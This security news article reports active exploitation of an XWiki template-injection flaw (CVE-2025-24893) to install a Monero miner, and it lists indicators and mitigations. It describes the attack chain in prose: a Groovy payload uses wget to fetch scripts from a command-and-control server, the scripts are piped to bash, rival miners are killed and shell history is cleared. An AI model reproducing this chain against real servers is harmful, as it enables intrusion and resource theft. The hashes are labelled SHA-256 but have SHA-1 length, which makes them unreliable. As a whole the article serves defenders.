Critical XWiki Vulnerability Exploited to Deploy Cryptocurrency Miners
Article Text:
A severe remote code execution (RCE) vulnerability in XWiki, a widely used open-source wiki platform, has been actively exploited to install cryptocurrency mining malware on compromised servers. This flaw, identified as CVE-2025-24893, enables unauthenticated attackers to inject malicious templates and execute arbitrary code, effectively bypassing all authentication mechanisms.
The exploitation of this vulnerability underscores the escalating threats to web applications, where real-world attacks often precede official alerts from organizations like the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog.
VulnCheck, a firm specializing in vulnerability intelligence, detected this exploitation through their Canary network, which simulates vulnerable systems to identify attacks. Unlike earlier reports from Cyble, Shadow Server, and CrowdSec that noted mere exploit attempts, VulnCheck’s findings reveal a sophisticated two-stage attack originating from an IP address in Vietnam.
The vulnerability, added to VulnCheck’s KEV in March 2025, involves template injection in XWiki’s SolrSearch endpoint, allowing attackers to execute Groovy scripts for command execution. This absence from CISA’s KEV highlights how exploitation can surge before formal recognition, leaving organizations vulnerable.
The Two-Stage Exploitation Process
The attack unfolds in two distinct phases, separated by at least 20 minutes, likely to evade detection mechanisms.
1. Initial Phase: Attackers send a URL-encoded GET request to the SolrSearch endpoint, injecting an asynchronous Groovy payload that utilizes `wget` to download a script named `x640` from a command-and-control (C2) server located at 193.32.208.24:8080. This script is saved to `/tmp/11909` on the target system. The payload mimics legitimate browser traffic by using a Firefox user agent to blend in.
2. Secondary Phase: Approximately 20 minutes later, a second request executes the staged file by invoking `bash` on `/tmp/11909`. The downloader then fetches two additional scripts, `x521` and `x522`, piping them directly to `bash` for execution.
– `x521` Script: Creates directories in `/var/tmp`, downloads the coinminer binary `tcrond` from the same C2 server, and sets executable permissions.
– `x522` Script: Cleans the environment by terminating competing miners like `xmrig` and `kinsing`, clears history logs, and launches `tcrond` with a configuration pointing to `auto.c3pool.org` on port 80.
The miner, packed with UPX for obfuscation, uses a Monero wallet address for payouts, indicating a low-sophistication but persistent operation. All traffic traces back to 123.25.249.88, flagged in multiple AbuseIPDB reports for abusive activity.
Key Indicators
Defenders can use the following indicators to identify similar activities across networks. The exploitation leverages `transfer.sh` for hosting payloads, a common tactic in cryptojacking campaigns.
– IP Addresses:
– 123.25.249.88 (Attacker, Vietnam)
– 193.32.208.24 (C2 Server)
– File Hashes (SHA-256):
– `tcrond` (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
– `tcrond` (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
– `x521`: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
– `x522`: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
– `x640`: 5abc337dbc04fee7206956dad1e0b6d43921a868
– CVSS Score: 9.8 (Critical) – Unauthenticated RCE via template injection in XWiki versions prior to 15.10.6
– Affected Products: XWiki Enterprise, XWiki Standard; impacts web servers running vulnerable instances
Mitigation Measures
Organizations utilizing XWiki should take immediate action to mitigate this vulnerability:
1. Update XWiki: Upgrade to version 15.10.6 or later to patch the vulnerability.
2. Monitor Network Traffic: Keep an eye out for unusual `wget` traffic patterns that may indicate exploitation attempts.
3. Scan for Indicators of Compromise (IOCs): Regularly scan systems for the IOCs listed above to detect potential breaches.
VulnCheck’s Canaries highlight the importance of proactive threat intelligence in bridging gaps left by delayed official listings.
